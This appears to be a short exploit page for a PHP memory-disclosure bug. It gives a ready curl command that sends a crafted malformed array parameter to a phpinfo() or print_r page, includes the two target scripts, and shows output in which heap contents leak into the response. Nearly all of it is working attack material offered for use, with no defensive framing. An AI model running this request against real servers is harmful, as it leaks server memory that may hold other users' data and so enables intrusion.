PHP Array Heap Content Disclosure Exploit
$ curl "http://www.example.com/phpinfo.php" -d `perl -e 'print
"f"x100;print "[g][=1"'`
where phpinfo.php is:
<?
phpinfo();
?>
or you can point to some PHP file containing print_r function:
<?
print_r($_REQUEST);
?>
Will result in the following content returning:
Array
(
[ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffff] => Array
(
[g\0_\0123\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\0\0\0\0\0] => 1
)
)
推荐
评论(0条)
